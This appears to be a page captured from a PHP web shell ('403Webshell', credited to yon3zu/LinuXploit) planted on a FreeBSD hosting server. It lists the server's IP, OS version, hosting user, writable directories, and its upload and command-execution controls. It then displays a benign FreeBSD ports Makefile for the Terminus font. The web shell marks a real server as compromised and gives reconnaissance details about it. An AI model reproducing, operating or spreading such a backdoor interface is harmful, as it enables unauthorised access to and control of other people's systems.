403Webshell
Server IP : 82.208.35.60  /  Your IP : 216.73.216.89
Web Server : Apache/2.4.55 (FreeBSD) OpenSSL/1.1.1q-freebsd PHP/7.3.31
System : FreeBSD server7.d2m.cz 12.4-RELEASE-p9 FreeBSD 12.4-RELEASE-p9 GENERIC amd64
User : studiokobylisy_cz ( 1008)
PHP Version : 7.3.31
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /usr/ports/x11-fonts/terminus-font/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/ports/x11-fonts/terminus-font/Makefile
PORTNAME=	terminus-font
PORTVERSION=	4.48
CATEGORIES=	x11-fonts
MASTER_SITES=	SF/${PORTNAME:tl}/${PORTNAME}-${PORTVERSION}

MAINTAINER=	x11@FreeBSD.org
COMMENT=	Terminus Font - a clean fixed width font
WWW=		http://terminus-font.sourceforge.net

LICENSE=	OFL11

BUILD_DEPENDS=	bdftopcf:x11-fonts/bdftopcf

USES=		gmake fonts python:build,3.5+ shebangfix
NO_ARCH=	yes

SHEBANG_FILES=	bin/*.py

OPTIONS_DEFINE=	AO2 DV1 GE2 GQ2 IJ1 KA2 HI2 LL2 TD1
AO2_DESC=	Variant of letter 'a'
DV1_DESC=	Variant of cyrillic letters 'de' and 've'
GE2_DESC=	Variant of cyrillic letter 'ge'
GQ2_DESC=	Variant of grave accent and apostrophe
IJ1_DESC=	Variant of cyrillic letters 'i' and 'short i'
KA2_DESC=	Variant of cyrillic letter 'ka'
HI2_DESC=	Higher uppercase letters, for size 18
LL2_DESC=	Variant with more distinctive 'l' (ell)
TD1_DESC=	Variant with centered '~'

SUB_FILES=	pkg-message

.include <bsd.port.options.mk>

ALL_TARGET=	pcf pcf-8bit

post-extract:
.if ${PORT_OPTIONS:MAO2}
	cd ${WRKSRC} && ${PATCH} -p1 -i alt/ao2.diff
.endif
.if ${PORT_OPTIONS:MDV1} && !${PORT_OPTIONS:MHI2}
	cd ${WRKSRC} && ${PATCH} -p1 -i alt/dv1.diff
.endif
.if ${PORT_OPTIONS:MGE2}
	cd ${WRKSRC} && ${PATCH} -p1 -i alt/ge2.diff
.endif
.if ${PORT_OPTIONS:MGQ2}
	cd ${WRKSRC} && ${PATCH} -p1 -i alt/gq2.diff
.endif
.if ${PORT_OPTIONS:MIJ1}
	cd ${WRKSRC} && ${PATCH} -p1 -i alt/ij1.diff
.endif
.if ${PORT_OPTIONS:MKA2} && !${PORT_OPTIONS:MHI2}
	cd ${WRKSRC} && ${PATCH} -p1 -i alt/ka2.diff
.endif
.if ${PORT_OPTIONS:MHI2}
	cd ${WRKSRC} && ${PATCH} -p1 -i alt/hi2.diff
.if ${PORT_OPTIONS:MDV1}
	cd ${WRKSRC} && ${PATCH} -p1 -i alt/hi2-dv1.diff
.endif
.if ${PORT_OPTIONS:MKA2}
	cd ${WRKSRC} && ${PATCH} -p1 -i alt/hi2-ka2.diff
.endif
.endif
.if ${PORT_OPTIONS:MLL2}
	cd ${WRKSRC} && ${PATCH} -p1 -i alt/ll2.diff
.endif
.if ${PORT_OPTIONS:MTD1}
	cd ${WRKSRC} && ${PATCH} -p1 -i alt/td1.diff
.endif

post-patch:
	${REINPLACE_CMD} -e 's|python3|${PYTHON_CMD}|g' ${WRKSRC}/Makefile

post-build:
	@${GZIP_CMD} ${WRKSRC}/*.pcf

do-install:
	@${MKDIR} ${STAGEDIR}${FONTSDIR}
	${INSTALL_DATA} ${WRKSRC}/*.pcf.gz ${STAGEDIR}${FONTSDIR}

.include <bsd.port.mk>

Youez - 2016 - github.com/yon3zu
LinuXploit